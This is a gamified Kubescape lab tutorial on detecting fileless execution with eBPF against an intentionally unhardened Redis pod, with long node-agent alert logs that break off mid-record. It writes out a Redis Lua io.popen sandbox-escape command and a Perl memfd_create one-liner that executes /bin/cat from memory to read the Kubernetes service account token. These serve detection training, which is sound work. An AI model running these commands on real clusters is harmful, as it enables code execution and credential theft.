Lesson Β inΒ  Kubescape Nodeagent Dungeon

An eBPF Adventure

The Realm -- Enter the Dungeon

Welcome, adventurer. In this quest you trace a fileless execution from the moment memfd_create fires in the Linux kernel to the moment node-agent raises R1005 --- "Fileless execution detected". Along the way you meet the Fellowship and learn how eBPF-based runtime detection works.

No prior eBPF knowledge is required. If you can run kubectl and read Go, you are ready.


The Dungeon Map

You stand at the threshold of an ancient fortress buried beneath every running container. A single event --- execve("/proc/self/fd/3") --- will be your torch as you descend. By the time it emerges from the far tower, it will have been captured, translated, ordered, enriched, archived, judged, and proclaimed. This is the Dungeon of the Running Container.

Dungeon Map

The Fellowship

RoomGuardianComponentRepoWhat They Do
1The KernelLinux kernel-Executes memfd_create + execve without judgment
2Inspector Gadgettrace_exec eBPF gadgetnode-agentCaptures every execve in every container
3The ScribesExecOperatornode-agentParses raw eBPF args into Go structs
4The TimekeeperOrderedEventQueuenode-agentSorts events by nanosecond timestamp
5The LoremasterEventEnrichernode-agentBuilds process tree + K8s context
6The ArchivistProfileManagernode-agentRecords "normal" behavior during learning
7The Vault KeeperStorage PreSavestorageCollapses paths via trie algorithm
8The InquisitorCEL RuleManagernode-agentEvaluates R1005 against event.exepath
9The HeraldExporternode-agentShips alerts to stdout / AlertManager / HTTP

What is eBPF? Small verified programs that run inside the kernel, observing syscalls without modifying kernel source or loading modules. The kernel's verifier guarantees safety before execution. Think of it as invisible enchantment threads woven into the kernel fabric.


Setting Up the Realm

The ApplicationProfile -- the Tome of Behavior

A penguin from the cold lands of Finland, with a somewhat stern demeanor

Step 1: Deploy Kubescape with runtime detection

Check it is running and healthy, kubectl get all -n kubescape

Wait for the node-agent DaemonSet, the storage deployment, the CRDs etc to be ready:

Step 2: Deploy a vulnerable Redis

Our image (ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10) is Redis 7.2.10 with lots of unnecessary functionality and way too little hardening. We use it to mimick-reproduce CVE-2022-0543 : this was a packaging issue for debian based redis. What we show you below is not a real vulnerability. In Redis, the Lua Sandbox can often be escaped by real exploits (but they tend to not be deterministic in such lab-environments as this). The point of this lab is not the exploit, but the detection of fileless execution via memfd + /proc/self/fd. If you are so inclined, you can lookup the actual exploit and recreate it and detect it.

kubectl -n redis get all

Step 3: Check alerts during benign traffic

In Terminal1, run

kubectl logs -n kubescape -l app=node-agent -c node-agent -f

Node-agent builds an ApplicationProfile of "normal" behavior. Exercise the operations Redis would use in production in another Terminal2:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec "$REDIS_POD" -- redis-cli PING
kubectl -n redis exec "$REDIS_POD" -- redis-cli SET bobtest hello
kubectl -n redis exec "$REDIS_POD" -- redis-cli GET bobtest
kubectl -n redis exec "$REDIS_POD" -- redis-cli INFO server
kubectl -n redis exec "$REDIS_POD" -- redis-cli DBSIZE
kubectl -n redis exec "$REDIS_POD" -- redis-cli EVAL "return 'hello'" 0
kubectl -n redis exec "$REDIS_POD" -- redis-cli DEL bobtest

If you check the Terminal1 with the logs , there should be none. This is because we have previously taught The Archivist (see Room 6) that the above commands are allowed for redis.

Step 4: Execute the exploit

Phase 1 --- Prove the alerting is working: In Terminal2, run

kubectl -n redis exec "$REDIS_POD" -- redis-cli EVAL "
local f = io.popen('id')
local res = f:read('*a')
f:close()
return 'Test ID: ' .. res
" 0

Expected (in Terminal2): Test ID: uid=999(redis) gid=999(redis) groups=999(redis)

In a current and patched Redis, you would see Script attempted to access nonexistent global variable 'io', we are confirming hereby that we have the unhardened version.

Alerts (in Terminal1)

To confirm that kubescape is installed correctly and everything is working ok, you should now be seeing 2 unexpected processes and a handful of unexpected syscall alerts.

{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/bin/sh","-c","id"],"exec":"/bin/sh","message":"Unexpected process launched: sh with PID 111770"},"infectedPID":111770,"severity":1,"timestamp":"2026-03-01T17:12:18.988119911Z","trace":{},"uniqueID":"e02cfa37d3e36766b3d4c8757190a398","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"sh","commandLine":"/bin/sh -c id"},"file":{"name":"dash","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server","childrenMap":{"sh␟111770":{"pid":111770,"cmdline":"/bin/sh -c id","comm":"sh","ppid":99476,"pcomm":"redis-server","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash"}}},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: sh with PID 111770","msg":"Unexpected process launched","processtree_depth":"2","time":"2026-03-01T17:12:19Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/usr/bin/id"],"exec":"/usr/bin/id","message":"Unexpected process launched: id with PID 111771"},"infectedPID":111771,"severity":1,"timestamp":"2026-03-01T17:12:18.989190515Z","trace":{},"uniqueID":"732769abf49bbc7bb1f0951239713b23","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"id","commandLine":"/usr/bin/id "},"file":{"name":"id","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server","childrenMap":{"sh␟111770":{"pid":111770,"cmdline":"/bin/sh -c id","comm":"sh","ppid":99476,"pcomm":"redis-server","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/dash","childrenMap":{"id␟111771":{"pid":111771,"cmdline":"/usr/bin/id","comm":"id","ppid":111770,"pcomm":"sh","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/id"}}}}},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: id with PID 111771","msg":"Unexpected process launched","processtree_depth":"3","time":"2026-03-01T17:12:19Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: vfork with PID 99476","syscall":"vfork"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.34440098Z","trace":{},"uniqueID":"b418b1f39648b24e8568033dbe853bdf","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: vfork with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: dup2 with PID 99476","syscall":"dup2"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.332064711Z","trace":{},"uniqueID":"52aea2a22cdf2766b3f2ca48c6494182","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: dup2 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: wait4 with PID 99476","syscall":"wait4"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.364435324Z","trace":{},"uniqueID":"4cbc7380cdf7af107cd8c4378c3c0a63","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: wait4 with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getgid with PID 99476","syscall":"getgid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.405230003Z","trace":{},"uniqueID":"5ddee8ba451f8aad1b9d59403ce835b5","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getgid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: geteuid with PID 99476","syscall":"geteuid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.420406502Z","trace":{},"uniqueID":"242f2128e99c30f6624b041dc55c1cd2","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: geteuid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getegid with PID 99476","syscall":"getegid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.440743775Z","trace":{},"uniqueID":"4a1d64b1880c220f7ef907d344b0c973","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getegid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getgroups with PID 99476","syscall":"getgroups"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.489145766Z","trace":{},"uniqueID":"00d28e48bbd818de383997313f113f9d","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getgroups with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}
{"BaseRuntimeMetadata":{"alertName":"Syscalls Anomalies in container","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","message":"Unexpected system call detected: getuid with PID 99476","syscall":"getuid"},"infectedPID":99476,"md5Hash":"e86b9933a697eea115b852c5be170fb2","sha1Hash":"ab2e96f4cedbd556f73dd1bcf16dee496d1b1482","severity":1,"size":"10 MB","timestamp":"2026-03-01T17:12:40.40487544Z","trace":{},"uniqueID":"a885588f25ef850dcc43fef677f8c95f","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"redis"}}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":99476,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":99320,"pcomm":"containerd-shim","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","cwd":"/","path":"/usr/local/bin/redis-server"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected system call detected: getuid with PID 99476","msg":"Syscalls Anomalies in container","processtree_depth":"1","time":"2026-03-01T17:12:40Z"}

We do not particularily care about the details, this is to confirm that alerting and install are correct.

Phase 2 --- Fileless execution via memfd_create:

Now, it's time for the real threat:

memfd_create
kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'

This creates an anonymous in-memory fd (memfd_create), copies /bin/cat into it, then calls execve("/proc/self/fd/3"). No file touches disk. This triggers R1005.

Alerts
{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/usr/bin/perl","-e","\nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds"],"exec":"/usr/bin/perl","message":"Unexpected process launched: perl with PID 116061"},"infectedPID":116061,"severity":1,"timestamp":"2026-03-01T17:14:23.506032305Z","trace":{},"uniqueID":"452b0edfe862133c04a3660218ac80bb","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"perl","commandLine":"/usr/bin/perl -e \nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds"},"file":{"name":"perl","directory":"/usr/bin"}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/usr/bin/perl -e \nuse strict; use warnings;\nmy $name = \"pwned\";\nmy $fd = syscall(279, $name, 0);\nif ($fd \u003c 0) { $fd = syscall(319, $name, 0); }\ndie \"memfd_create failed\\n\" if $fd \u003c 0;\nopen(my $src, \"\u003c:raw\", \"/bin/cat\") or die;\nopen(my $dst, \"\u003e\u0026=\", $fd) or die;\nbinmode $ds","comm":"perl","ppid":99320,"pcomm":"runc","uid":999,"gid":999,"startTime":"0001-01-01T00:00:00Z","path":"/usr/bin/perl"},"containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227"},"level":"error","message":"Unexpected process launched: perl with PID 116061","msg":"Unexpected process launched","processtree_depth":"1","time":"2026-03-01T17:14:23Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"apChecksum":"c8759f370c607e8afa444a8e2cf6d816e894256856d0e59c429c9e326d2fdd53","args":["/proc/self/fd/3","/var/run/secrets/kubernetes.io/serviceaccount/token"],"exec":"/proc/self/fd/3","message":"Unexpected process launched: 3 with PID 116061"},"infectedPID":116061,"severity":1,"timestamp":"2026-03-01T17:14:23.514675324Z","trace":{},"uniqueID":"905a7383968958ff8dd7260602baed47","profileMetadata":{"status":"completed","completion":"complete","name":"replicaset-redis-54f999cb48","failOnProfile":true,"type":0},"identifiers":{"process":{"name":"3","commandLine":"/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token"},"file":{"name":"memfd:pwned","directory":"."}}},"CloudMetadata":null,"RuleID":"R0001","RuntimeK8sDetails":{"clusterName":"default","containerName":"redis","hostNetwork":false,"image":"ghcr.io/k8sstormcenter/redis-vulnerable:7.2.10","imageDigest":"sha256:deef18281b522c341a1664c85077e6bba7498c20ca92a93bec18375a44d467be","namespace":"redis","containerID":"86803b9e65d1a6a1b315cf12391c2169ecf0c7cd1d5a02012f41381d8f59a227","podName":"redis-54f999cb48-rcpjv","podNamespace":"redis","podUID":"1e89d54b-ec36-41bb-bc82-2028bcde62bb","podLabels":{"app.kubernetes.io/name":"redis","app.kubernetes.io/version":"7.2.10","pod-template-hash":"54f999cb48"},"workloadName":"redis","workloadNamespace":"redis","workloadKind":"Deployment","workloadUID":"2cfaafda-69b7-4124-854b-771803fd9021"},"RuntimeProcessDetails":{"processTree":{"pid":116061,"cmdline":"/proc/self/fd/3 